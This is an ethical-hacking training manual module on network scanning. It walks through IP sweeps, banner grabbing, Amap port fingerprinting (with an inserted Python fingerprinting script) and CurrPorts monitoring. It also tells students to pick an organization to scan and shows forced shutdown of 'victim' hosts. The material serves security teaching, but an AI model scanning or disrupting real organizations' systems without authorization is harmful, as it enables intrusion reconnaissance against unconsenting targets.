CEH Lab Manual
Scanning Networks
Module 03
Module 03 - Scanning Networks
Scanning a Target Network
Scanning a network refers to a set of procedures for identifying hosts, ports, and services running in a network.
Lab Scenario
Vulnerability scanning determines the possibility of network security attacks. It
evaluates the organization’s systems and network for vulnerabilities such as missing
patches, unnecessary services, weak authentication, and weak encryption.
Vulnerability scanning is a critical component of any penetration testing assignment.
You need to conduct penetration testing and list the threats and vulnerabilities found in an organization's network, and perform port scanning, network scanning, and vulnerability scanning to identify IP/hostname, live hosts, and vulnerabilities.
Lab Objectives
The objective of this lab is to help students in conducting network scanning, analyzing the network vulnerabilities, and maintaining a secure network.
You need to perform a network scan to:
■ Check live systems and open ports
■ Perform banner grabbing and OS fingerprinting
■ Identify network vulnerabilities
■ Draw network diagrams of vulnerable hosts
Lab Environment
In the lab, you need:
■ A computer running Windows Server 2012, Windows Server 2008, Windows 8 or Windows 7 with Internet access
■ A web browser
■ Administrative privileges to run tools and perform scans
Lab Duration
Time: 50 Minutes
Overview of Scanning Networks
Building on what we learned from our information gathering and threat modeling, we can now begin to actively query our victims for vulnerabilities that may lead to a compromise. We have narrowed down our attack surface considerably since we first began the penetration test with everything potentially in scope.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 85
Note that not all vulnerabilities will result in a system compromise. When searching for known vulnerabilities you will find more issues that disclose sensitive information or cause a denial of service condition than vulnerabilities that lead to remote code execution. These may still turn out to be very interesting on a penetration test. In fact, even a seemingly harmless misconfiguration can be the turning point in a penetration test that gives up the keys to the kingdom.
For example, consider FTP anonymous read access. This is a fairly normal setting. Though FTP is an insecure protocol and we should generally steer our clients towards using more secure options like SFTP, using FTP with anonymous read access does not by itself lead to a compromise. If you encounter an FTP server that allows anonymous read access, but read access is restricted to an FTP directory that does not contain any files that would be interesting to an attacker, then the risk associated with the anonymous read option is minimal. On the other hand, if you are able to read the entire file system using the anonymous FTP account, or possibly even worse, someone has mistakenly left the customer's trade secrets in the FTP directory that is readable to the anonymous user, this configuration is a critical issue.
Vulnerability scanners do have their uses in a penetration test, and it is certainly useful to know your way around a few of them. As we will see in this module, using a vulnerability scanner can help a penetration tester quickly gain a good deal of potentially interesting information about an environment.
In this module we will look at several forms of vulnerability assessment. We will study some commonly used scanning tools.
Lab Tasks
Pick an organization that you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity.
Recommended labs to assist you in scanning networks:
■ Scanning System and Network Resources Using Advanced IP Scanner
■ Banner Grabbing to Determine a Remote Target System Using ID Serve
■ Fingerprint Open Ports for Running Applications Using the Amap Tool
■ Monitor TCP/IP Connections Using the CurrPorts Tool
■ Scan a Network for Vulnerabilities Using GFI LanGuard 2012
■ Explore and Audit a Network Using Nmap
■ Scanning a Network Using the NetScan Tools Pro
■ Drawing Network Diagrams Using LANSurveyor
■ Mapping a Network Using the Friendly Pinger
■ Scanning a Network Using the Nessus Tool
■ Auditing Scanning by Using Global Network Inventory
■ Anonymous Browsing Using Proxy Switcher
■ Daisy Chaining Using Proxy Workbench
■ HTTP Tunneling Using HTTPort
■ Basic Network Troubleshooting Using the MegaPing
■ Detect, Delete and Block Google Cookies Using G-Zapper
■ Scanning the Network Using the Colasoft Packet Builder
■ Scanning Devices in a Network Using The Dude
Ensure you have ready a copy of the additional readings handed out for this lab.
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Scanning System and Network Resources Using Advanced IP Scanner
Advanced IP Scanner is a free network scanner that gives you various types of information regarding local network computers.
Lab Scenario
In this day and age, where attackers are able to wait for a single chance to attack an organization to disable it, it becomes very important to perform vulnerability scanning to find the flaws and vulnerabilities in a network and patch them before an attacker intrudes into the network. The goal of running a vulnerability scanner is to identify devices on your network that are open to known vulnerabilities.
Lab Objectives
The objective of this lab is to help students perform a local network scan and discover all the resources on the network.
You need to:
■ Perform a system and network scan
■ Enumerate user accounts
■ Execute remote penetration
■ Gather information about local network computers
Lab Environment
In the lab, you need:
■ Advanced IP Scanner located at Z:\CEHv8 Module 03 Scanning Networks\Scanning Tools\Advanced IP Scanner
■ You can also download the latest version of Advanced IP Scanner from the link http://www.advanced-ip-scanner.com
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows 8 as the attacker (host machine)
■ Another computer running Windows Server 2008 as the victim (virtual machine)
■ A web browser with Internet access
■ Double-click ipscan20.msi and follow the wizard-driven installation steps to install Advanced IP Scanner
■ Administrative privileges to run this tool
Lab Duration
Time: 20 Minutes
Overview of Network Scanning
Network scanning is performed to collect information about live systems, open ports, and network vulnerabilities. The gathered information helps in determining threats and vulnerabilities in a network and in finding out whether there are any suspicious or unauthorized IP connections, which may enable data theft and cause damage to resources.
Lab Tasks
1. Go to Start by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 1.1: Windows 8 - Desktop view
2. Click Advanced IP Scanner from the Start menu in the attacker machine (Windows 8).
Advanced IP Scanner works on Windows Server 2003/Server 2008 and on Windows 7 (32 bit, 64 bit).
FIGURE 1.2: Windows 8 - Apps (Start screen tiles, including Advanced IP Scanner)
3. The Advanced IP Scanner main window appears.
FIGURE 1.3: The Advanced IP Scanner main window
4. Now launch the Windows Server 2008 virtual machine (victim's machine).
With Advanced IP Scanner, you can scan hundreds of IP addresses simultaneously.
You can wake any machine remotely with Advanced IP Scanner, if the Wake-on-LAN feature is supported by your network card.
FIGURE 1.4: The victim machine, Windows Server 2008
5. Now, switch back to the attacker machine (Windows 8) and enter an IP address range in the Select range field.
6. Click the Scan button to start the scan.
7. Advanced IP Scanner scans all the IP addresses within the range and displays the scan results after completion.
You have to guess a range of IP addresses of the victim machine.
Radmin 2.x and 3.x integration enables you to connect (if Radmin is installed) to remote computers with just one click.
The status of the scan is shown at the bottom left side of the window.
FIGURE 1.6: The Advanced IP Scanner main window after scanning (range 10.0.0.1-10.0.0.10; columns: Status, Name, IP, Manufacturer, MAC address; status bar: 5 alive, 0 dead, 5 unknown)
8. You can see in the above figure that Advanced IP Scanner has detected the victim machine's IP address and displays the status as alive.
9. Right-click any of the detected IP addresses. It will list Wake-On-LAN, Shut down, and Abort Shut down.
FIGURE 1.7: The Advanced IP Scanner main window with Alive Host list (right-click menu: Add to 'Favorites', Rescan selected, Save selected..., Wake-On-LAN, Shut down..., Abort shut down, Radmin, Explore, Copy; status bar: 5 alive, 0 dead, 5 unknown)
10. The list displays properties of the detected computer, such as IP address, Name, MAC, and NetBIOS information.
11. You can forcefully Shutdown, Reboot, and Abort Shutdown the selected victim machine/IP address.
Saving and loading lists of computers enables you to perform operations with a specific list of computers. Just save a list of machines you need and Advanced IP Scanner loads it at startup automatically.
Group Operations: Any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few clicks.
Winfingerprint input options: IP Range (Netmask and Inverted Netmask supported), IP List, Single Host, Neighborhood.
FIGURE 1.8: The Advanced IP Scanner Computer properties window (Shutdown options: Use Windows authentication, User name, Password, Timeout (sec): 60, Message, Forced shutdown, Reboot)
12. Now you have the IP address, Name, and other details of the victim machine.
13. You can also try Angry IP Scanner, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Ping Sweep Tools\Angry IP Scanner. It also scans the network for machines and ports.
Lab Analysis
Document all the IP addresses, open ports and their running applications, and protocols discovered during the lab.
Tool/Utility: Advanced IP Scanner
Information Collected/Objectives Achieved:
Scan Information:
■ IP address
■ System name
■ MAC address
■ NetBIOS information
■ Manufacturer
■ System status
Questions
1. Examine and evaluate the IP addresses and range of IP addresses.
Internet Connection Required
□ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Banner Grabbing to Determine a Remote Target System Using ID Serve
ID Serve is used to identify the make, model, and version of any website's server software.
Lab Scenario
In the previous lab, you learned to use Advanced IP Scanner. This tool can also be used by an attacker to detect vulnerabilities such as buffer overflows, integer overflows, SQL injection, and web application flaws on a network. If these vulnerabilities are not fixed immediately, attackers can easily exploit them, break into the network, and cause server damage.
Therefore, it is extremely important for penetration testers to be familiar with banner grabbing techniques to monitor servers to ensure compliance and appropriate security updates. Using this technique you can also locate rogue servers or determine the role of servers within a network. In this lab, you will learn the banner grabbing technique to determine a remote target system using ID Serve.
Lab Objectives
The objective of this lab is to help students learn to banner grab a website and discover the applications running on it.
In this lab you will learn to:
■ Identify the domain IP address
■ Identify the domain information
Lab Environment
To perform the lab you need:
■ ID Serve is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\ID Serve
■ You can also download the latest version of ID Serve from the link http://www.grc.com/id/idserve.htm
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Double-click idserve to run ID Serve
■ Administrative privileges to run the ID Serve tool
■ Run this tool on Windows Server 2012
Lab Duration
Time: 5 Minutes
Overview of ID Serve
ID Serve can connect to any server port on any domain or IP address, then pull and display the server's greeting message, if any, often identifying the server's make, model, and version, whether it's for FTP, SMTP, POP, NEWS, or anything else.
Lab Tasks
1. Double-click idserve located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\ID Serve
2. In the main window of ID Serve shown in the following figure, select the Server Query tab
If an IP address is entered instead of a URL, ID Serve will attempt to determine the domain name associated with the IP.
FIGURE 2.1: Main window of ID Serve (Internet Server Identification Utility v1.02, Personal Security Freeware by Steve Gibson, Copyright (c) 2003 by Gibson Research Corp.; tabs: Background, Server Query, Q&A/Help)
3. Enter the IP address or URL in the field labelled Enter or copy/paste an Internet server URL or IP address here:
ID Serve can accept the URL or IP as a command-line parameter.
FIGURE 2.2: Entering the URL for query (www.certifiedhacker.com)
4. Click Query The Server; it shows the server query processed information.
FIGURE 2.3: Server processed information. The query log shown in the figure reads:
Initiating server query
Looking up IP address for domain www.certifiedhacker.com
The IP address for the domain is 202.75.54.101
Connecting to the server on standard HTTP port: 80
Connected! Requesting the server's default page
The server identified itself as
Microsoft-IIS/6.0
ID Serve can also connect with non-web servers to receive and report that server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information.
Lab Analysis
Document all the IP addresses, their running applications, and the protocols you discovered during the lab.
Tool/Utility: ID Serve
Information Collected/Objectives Achieved:
IP address: 202.75.54.101
Server Connection: Standard HTTP port: 80
Response headers returned from server:
■ HTTP/1.1 200
■ Server: Microsoft-IIS/6.0
■ X-Powered-By: PHP/4.4.8
■ Transfer-Encoding: chunked
■ Content-Type: text/html
Questions
1. Examine which protocols ID Serve handles.
2. Check if ID Serve supports https (SSL) connections.
Internet Connection Required
□ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Fingerprinting Open Ports Using the Amap Tool
Amap determines the applications running on each open port.
Lab Scenario
Computers communicate with each other by knowing the IP address in use, and ports determine which program receives the data. A complete data transfer always contains the IP address plus the port number required. In the previous lab we found out that the server connection is using the standard HTTP port 80. If an attacker finds this information, he or she will be able to use the open ports for attacking the machine.
In this lab, you will learn to use the Amap tool to perform port scanning and know exactly what applications are running on each port found open.
Lab Objectives
The objective of this lab is to help students learn to fingerprint open ports and discover the applications running on these open ports.
In this lab, you will learn to:
■ Identify the application protocols running on open port 80
■ Detect application protocols
Lab Environment
To perform the lab you need:
■ Amap is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP
■ You can also download the latest version of Amap from the link http://www.thc.org/thc-amap
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Web Services enabled for port 80
■ Administrative privileges to run the Amap tool
■ Run this tool on Windows Server 2012
Lab Duration
Time: 5 Minutes
Overview of Fingerprinting
Fingerprinting is used to discover the applications running on each open port found on the network. Fingerprinting is achieved by sending trigger packets and looking up the responses in a list of response strings.
Lab Tasks
1. Open the command prompt and navigate to the Amap directory. In this lab the Amap directory is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP
2. Type amap www.certifiedhacker.com 80, and press Enter.
Administrator: Command Prompt
D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP>amap www.certifiedhacker.com 80
amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:20:42 - MAPPING mode
Unidentified ports: 202.75.54.101:80/tcp (total 1).
amap v5.2 finished at 2012-08-28 12:20:53
D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP>
FIGURE 3.1: Amap with hostname www.certifiedhacker.com and port 80
3. You can see the specific application protocols running on the entered host name and port 80.
4. Use the IP address to check the applications running on a particular port.
5. In the command prompt, type the IP address of your local Windows Server 2008 (virtual machine) with a port range, e.g. amap 10.0.0.4 75-81, and press Enter (the IP address will be different in your network).
6. Try scanning different websites using different port ranges, like amap www.certifiedhacker.com 1-200
Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port]...]
For Amap options, type amap -help.
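The banner grab the ID Serve lab performs and the trigger-and-match fingerprinting described in the Amap overview, as one added example that is not the code of either tool: it sends a trigger, parses the HTTP response headers that ID Serve lists, and reports every matching signature the way Amap does, including the unreachable-port case seen in the lab output. The signature list, the sample IIS reply and the host/port values are constructed assumptions.

```python
"""Trigger-and-match service fingerprinting, in the spirit of the ID Serve and Amap labs.

Added example, not the code of either tool. SIGNATURES is a small constructed subset
(real Amap ships a far larger list in its own definition files; this layout is an
assumption). Like Amap, every signature whose pattern matches is reported, which is
why the lab's port 80 came back as http, http-iis and webmin at the same time.
"""
import re
import socket
from typing import Dict, List, Optional, Tuple

HTTP_TRIGGER = b"GET / HTTP/1.0\r\n\r\n"

# (name, trigger bytes to send, regex expected in the reply); b"" means "just listen
# for the greeting", as with FTP and SMTP, which talk first.
SIGNATURES: List[Tuple[str, bytes, bytes]] = [
    ("http", HTTP_TRIGGER, rb"^HTTP/1\.[01] \d{3}"),
    ("http-iis", HTTP_TRIGGER, rb"\r\nServer: Microsoft-IIS"),
    ("http-apache-2", HTTP_TRIGGER, rb"\r\nServer: Apache/2"),
    ("ftp", b"", rb"^220[ -].*FTP"),
    ("smtp", b"", rb"^220[ -].*E?SMTP"),
]

# Constructed reply modelled on the headers the ID Serve lab recorded.
SAMPLE_IIS = (b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: PHP/4.4.8\r\n"
              b"Transfer-Encoding: chunked\r\nContent-Type: text/html\r\n\r\n<html>")


def match_signatures(reply: bytes) -> List[str]:
    """Names of every signature whose pattern matches the reply (Amap reports all)."""
    return [name for name, _trig, pat in SIGNATURES
            if re.search(pat, reply, re.IGNORECASE | re.DOTALL)]


def parse_http_headers(reply: bytes) -> Dict[str, str]:
    """Status line plus lower-cased header names, i.e. what ID Serve prints per server."""
    head = reply.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {"status": lines[0]}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def report(host: str, port: int, reply: Optional[bytes]) -> List[str]:
    """Amap-style lines: None = could not connect, no match = unidentified."""
    if reply is None:
        return [f"Warning: Could not connect (unreachable) to {host}:{port}/tcp, disabling port"]
    names = match_signatures(reply)
    if not names:
        return [f"Unidentified port: {host}:{port}/tcp"]
    return [f"Protocol on {host}:{port}/tcp matches {n}" for n in names]


def probe(host: str, port: int, timeout: float = 3.0) -> Optional[bytes]:
    """Send each distinct trigger on a fresh connection; return the first non-empty reply.

    None means the TCP connection itself failed; b"" means it connected but stayed silent.
    """
    triggers = list(dict.fromkeys(trig for _n, trig, _p in SIGNATURES))  # dedupe, keep order
    for trigger in triggers:
        try:
            sock = socket.create_connection((host, port), timeout=timeout)
        except OSError:
            return None
        with sock:
            try:
                if trigger:
                    sock.sendall(trigger)
                reply = sock.recv(4096)
            except OSError:  # includes timeout: the service did not answer this trigger
                reply = b""
        if reply:
            return reply
    return b""


def fingerprint(host: str, port: int) -> List[str]:
    """Live version of the lab command, e.g. fingerprint("10.0.0.4", 80)."""
    return report(host, port, probe(host, port))


if __name__ == "__main__":
    print("\n".join(report("10.0.0.4", 80, SAMPLE_IIS)))
    print(parse_http_headers(SAMPLE_IIS))
    print("\n".join(report("10.0.0.4", 75, None)))
```

The Server and X-Powered-By values the parser pulls out are exactly what an administrator would suppress or generalise on a production server, since they hand version information to anyone who connects.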
FIGURE 3.2: Amap with IP address and with port range 75-81. The command prompt shown in the figure reads:
D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP>amap 10.0.0.4 75-81
amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:27:51 - MAPPING mode
Protocol on 10.0.0.4:80/tcp matches http
Protocol on 10.0.0.4:80/tcp matches http-apache-2
Warning: Could not connect (unreachable) to 10.0.0.4:76/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:75/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:77/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:78/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:79/tcp, disabling port (EUNKN)
Warning: Could not connect (unreachable) to 10.0.0.4:81/tcp, disabling port (EUNKN)
Protocol on 10.0.0.4:80/tcp matches http-iis
Protocol on 10.0.0.4:80/tcp matches webmin
Unidentified ports: 10.0.0.4:75/tcp 10.0.0.4:76/tcp 10.0.0.4:77/tcp 10.0.0.4:78/tcp 10.0.0.4:79/tcp 10.0.0.4:81/tcp (total 6).
amap v5.2 finished at 2012-08-28 12:27:54
D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP>
Lab Analysis
Document all the IP addresses, open ports and their running applications, and the protocols you discovered during the lab.
Tool/Utility: Amap
Information Collected/Objectives Achieved:
Identified open port: 80
Web servers:
■ http-apache-2
■ http-iis
■ webmin
Unidentified ports:
■ 10.0.0.4:75/tcp
■ 10.0.0.4:76/tcp
■ 10.0.0.4:77/tcp
■ 10.0.0.4:78/tcp
■ 10.0.0.4:79/tcp
■ 10.0.0.4:81/tcp
Amap compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux and PalmOS.
Questions
1. Execute the Amap command for a host name with a port number other than 80.
2. Analyze how the Amap utility gets the applications running on different machines.
3. Use various Amap options and analyze the results.
Internet Connection Required
☑ Yes □ No
Platform Supported
☑ Classroom □ iLabs
Monitoring TCP/IP Connections Using the CurrPorts Tool
CurrPorts is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer.
Lab Scenario
In the previous lab you learned how to check for open ports using the Amap tool. As an ethical hacker and penetration tester, you must be able to block such attacks by using appropriate firewalls or disabling unnecessary services running on the computer.
You already know that the Internet uses a software protocol named TCP/IP to format and transfer data. An attacker can monitor ongoing TCP connections and can have all the information in the IP and TCP headers and the packet payloads, with which he or she can hijack the connection. As the attacker has all the information on the network, he or she can create false packets in the TCP connection.
As a network administrator, your daily task is to check the TCP/IP connections of each server you manage. You have to monitor all TCP and UDP ports and list all the established IP addresses of the server using the CurrPorts tool.
Lab Objectives
The objective of this lab is to help students determine and list all the TCP/IP and UDP ports of a local computer.
In this lab, you need to:
■ Scan the system for currently opened TCP/IP and UDP ports
■ Gather information on the ports and processes that are opened
■ List all the IP addresses that currently have established connections
■ Close unwanted TCP connections and kill the process that opened the ports
Lab Environment
To perform the lab, you need:
■ CurrPorts located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\CurrPorts
■ You can also download the latest version of CurrPorts from the link http://www.nirsoft.net/utils/cports.html
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Double-click cports.exe to run this tool
■ Administrator privileges to run the CurrPorts tool
Lab Duration
Time: 10 Minutes
You can download the CurrPorts tool from http://www.nirsoft.net.
Overview of Monitoring TCP/IP
Monitoring TCP/IP ports checks whether multiple IP connections are established. Scanning TCP/IP ports gets information on all the opened TCP and UDP ports and also displays all established IP addresses on the server.
Lab Tasks
The CurrPorts utility is a standalone executable and doesn't require any installation process or additional DLLs (Dynamic Link Libraries). Extract CurrPorts to the desired location and double-click cports.exe to launch it.
1. Launch CurrPorts. It automatically displays the process name, ports, IP and remote addresses, and their states.
FIGURE 4.1: The CurrPorts main window with all processes, ports, and IP addresses (columns: Process Name, Process ID, Protocol, Local Port, Local Port Name, Local Address, Remote Port, Remote Port Name, Remote Address, Remote Host Name; status bar: 79 Total Ports, 21 Remote Connections, 1 Selected)
2. CurrPorts lists all the processes and their IDs, protocols used, local
and remote IP addresses, local and remote ports, and remote host
names.
3. To view all the entries as an HTML page, click View > HTML Report -
All Items.
[Figure: CurrPorts View menu opened over the main window, with HTML Report - All Items selected. Menu entries: Show Grid Lines, Show Tooltips, Mark Odd/Even Rows, HTML Report - All Items, HTML Report - Selected Items, Choose Columns, Auto Size Columns, Refresh (F5).]
FIGURE 4.2: CurrPorts with HTML Report - All Items
4. The HTML Report automatically opens using die default browser.
[Figure: Firefox showing the generated report file (report.html in the cports-x64 folder on the Administrator desktop), titled "TCP/UDP Ports List - Created by using CurrPorts", with columns Process Name, Process ID, Protocol, Local Port, Local Port Name, Local Address, Remote Port, Remote Port Name, Remote Address, Remote Host Name, and rows for chrome.exe (PID 2988) connections from 10.0.0.7 to remote ports 80 and 443.]
FIGURE 4.3: The web browser displaying the CurrPorts Report - All Items
5. To save the generated CurrPorts report from the web browser, click
File > Save Page As... (Ctrl+S).
The CurrPorts utility is a standalone executable, which doesn't require any installation process or additional DLLs.
In the bottom left of the CurrPorts window, the status bar displays the total number of ports and remote connections.
To check the countries of the remote IP addresses, you have to download the latest IP-to-Country file and put the IpToCountry.csv file in the same folder as cports.exe.
[Figure: Firefox File menu (New Tab Ctrl+T, New Window Ctrl+N, Open File... Ctrl+O, Save Page As... Ctrl+S, Send Link..., Page Setup..., Print Preview, Print..., Exit) opened over the TCP/UDP Ports List report.]
FIGURE 4.4: The web browser to save the CurrPorts Report - All Items
6. To view only selected entries as an HTML page, select the entries and click
View > HTML Report - Selected Items.
[Figure: CurrPorts View menu with HTML Report - Selected Items highlighted; three entries are selected in the list. Status bar: 79 Total Ports, 21 Remote Connections, 3 Selected.]
FIGURE 4.5: CurrPorts with HTML Report - Selected Items
7. The selected report automatically opens in the default browser.
CurrPorts allows you to save all changes (added and removed connections) into a log file. To start writing to the log file, check the Log Changes option under the File menu.
By default, the log file is saved as cports.log in the same folder where cports.exe is located. You can change the default log filename by setting the LogFilename entry in the cports.cfg file.
Be aware: the log file is updated only when you refresh the ports list manually, or when the Auto Refresh option is turned on.
You can also right-click on the web page and save the report.
[Figure: Firefox showing the TCP/UDP Ports List report for the selected items, with columns Process Name, Process ID, Protocol, Local Port, Local Port Name, Local Address, Remote Port, Remote Port Name, Remote Address, Remote Host Name, State. Rows: chrome.exe, 2988, TCP, 4148, 10.0.0.7, 443, https, 173.194.36.26, bom04s01-in-f26.1e100.net, Established; firefox.exe, 1368, TCP, 4163, 10.0.0.7, 443, https, 173.194.36.15, bom04s01-in-f15.1e100.net, Established; httpd.exe, 1800, TCP, 1070, Listening.]
In the filters dialog box, you can add one or more filter strings (separated by spaces, semicolons, or CRLF).
FIGURE 4.6: The web browser displaying the CurrPorts HTML Report - Selected Items
8. To save the generated CurrPorts report from the web browser, click
File > Save Page As... (Ctrl+S).
[Figure: Firefox File menu with Save Page As... (Ctrl+S) opened over the TCP/UDP Ports List report for the selected items.]
FIGURE 4.7: The web browser to save the CurrPorts HTML Report - Selected Items
9. To view the properties of a port, select the port and click File >
Properties.
The syntax for a filter string is: [include | exclude]:[local | remote | both | process]:[tcp | udp | tcpudp]:[IP Range | Ports Range].
Command-line option: /stext <Filename> saves the list of all opened TCP/UDP ports into a regular text file.
[Figure: CurrPorts File menu. Entries: IPNetInfo (Ctrl+I), Close Selected TCP Connections (Ctrl+T), Kill Processes Of Selected Ports, Save Selected Items (Ctrl+S), Properties (Alt+Enter), Process Properties (Ctrl+P), Log Changes, Open Log File, Clear Log File, Advanced Options (Ctrl+O), Exit.]
Command-line option: /stab <Filename> saves the list of all opened TCP/UDP ports into a tab-delimited text file.
FIGURE 4.8: CurrPorts to view properties for a selected port
10. The Properties window appears and displays all the properties for the
selected port.
11. Click OK to close the Properties window.
[Figure: the CurrPorts Properties window for the selected port, showing the following fields:]
Process Name: firefox.exe
Process ID: 1368
Protocol: TCP
Local Port: 4166
Local Port Name: (blank)
Local Address: 10.0.0.7
Remote Port: 443
Remote Port Name: https
Remote Address: 173.194.36.0
Remote Host Name: bom04s01-in-f0.1e100.net
State: Established
Process Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Product Name: Firefox
File Description: Firefox
File Version: 14.0.1
Company: Mozilla Corporation
Process Created On: 8/25/2012 2:36:28 PM
User Name: WIN-D39MR5HL9E4\Administrator
Process Services: (blank)
Process Attributes: (blank)
Added On: 8/25/2012 3:32:58 PM
Module Filename: (blank)
Remote IP Country: (blank)
Window Title: (blank)
Command-line option: /shtml <Filename> saves the list of all opened TCP/UDP ports into an HTML file (horizontal).
FIGURE 4.9: The CurrPorts Properties window for the selected port
12. To close a TCP connection you think is suspicious, select the connection
and click File > Close Selected TCP Connections (or press Ctrl+T).
[Figure: CurrPorts File menu with Close Selected TCP Connections (Ctrl+T) highlighted.]
FIGURE 4.10: The CurrPorts Close Selected TCP Connections option window
13. To kill the processes of a port, select the port and click File > Kill
Processes Of Selected Ports.
[Figure: CurrPorts File menu with Kill Processes Of Selected Ports highlighted.]
FIGURE 4.11: The CurrPorts Kill Processes Of Selected Ports option window
14. To exit from the CurrPorts utility, click File > Exit. The CurrPorts
window closes.
TASK 2: Close TCP Connection
TASK 3: Kill Process
[Figure: CurrPorts File menu with Exit highlighted.]
Command-line option: /sverhtml <Filename> saves the list of all opened TCP/UDP ports into an HTML file (vertical).
FIGURE 4.12: The CurrPorts Exit option window
Lab Analysis
Document all the IP addresses, open ports and their running applications, and
protocols discovered during the lab.
Tool/Utility: CurrPorts
Information Collected/Objectives Achieved:
Profile Details: Network scan for open ports
Scanned Report:
■ Process Name
■ Process ID
■ Protocol
■ Local Port
■ Local Address
■ Remote Port
■ Remote Port Name
■ Remote Address
■ Remote Host Name
In the command line, the syntax of the /close command is: /close <Local Address> <Local Port> <Remote Address> <Remote Port>.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Analyze the results from CurrPorts by creating a filter string that displays
only connections with remote TCP port 80 and UDP port 53 and running it.
2. Analyze and evaluate the output results by creating a filter that displays only
the ports opened by the Firefox browser.
3. Determine the use of each of the following options that are available under
the Options menu of CurrPorts:
a. Display Established
b. Mark Ports Of Unidentified Applications
c. Display Items Without Remote Address
d. Display Items With Unknown State
Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
CurrPorts allows you to easily translate all menus, dialog boxes, and strings to other languages.
Lab
Scanning for Network Vulnerabilities Using GFI LanGuard 2012
GFI LANguard scans networks and ports to detect, assess, and correct any security
vulnerabilities that are found.
Lab Scenario
You have learned in the previous lab to monitor TCP/IP and UDP ports on your
local computer or network using CurrPorts. This tool automatically marks in
pink suspicious TCP/UDP ports owned by unidentified applications. To
prevent attacks pertaining to TCP/IP, you can select one or more items and then
close the selected connections.
Your company's web server is hosted by a large ISP and is well protected behind a
firewall. Your company needs to audit the defenses used by the ISP. After starting a
scan, a serious vulnerability was identified but not immediately corrected by the ISP.
An attacker uses this vulnerability and places a backdoor on the server. Using
the backdoor, the attacker gets complete access to the server and is able to
manipulate the information on the server. The attacker also uses the server to
leapfrog and attack other servers on the ISP network from this compromised one.
As a security administrator and penetration tester for your company, you need to
conduct penetration testing in order to determine the list of threats and
vulnerabilities to the network infrastructure you manage. In this lab, you will be
using GFI LanGuard 2012 to scan your network to look for vulnerabilities.
Lab Objectives
The objective of this lab is to help students conduct vulnerability scanning, patch
management, and network auditing.
In this lab, you need to:
■ Perform a vulnerability scan
■ Audit the network
■ Detect vulnerable ports
■ Identify security vulnerabilities
■ Correct security vulnerabilities with remedial action
Lab Environment
To perform the lab, you need:
■ GFI LanGuard located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\GFI LanGuard
■ You can also download the latest version of GFI LanGuard from the
link http://www.gfi.com/lannetscan
■ If you decide to download the latest version, then screenshots shown
in the lab might differ
■ A computer running Windows Server 2012 as the host machine
■ Windows Server 2008 running in a virtual machine
■ Microsoft .NET Framework 2.0
■ Administrator privileges to run the GFI LANguard Network Security
Scanner
■ The user must register on the GFI website
http://www.gfi.com/lannetscan to get a license key
■ Complete the subscription to get an activation code; the user will receive
an email that contains the activation code
Lab Duration
Time: 10 Minutes
Overview of Scanning the Network
As an administrator, you often have to deal separately with problems related to
vulnerability issues, patch management, and network auditing. It is your
responsibility to address all the vulnerability management needs and act as a virtual
consultant to give a complete picture of a network setup, provide risk analysis, and
maintain a secure and compliant network state faster and more effectively.
Security scans or audits enable you to identify and assess possible risks within a
network. Auditing operations imply any type of checking performed during a
network security audit. These include open port checks, missing Microsoft patches
and vulnerabilities, service information, and user or process information.
You can download GFI LANguard from http://www.gfi.com.
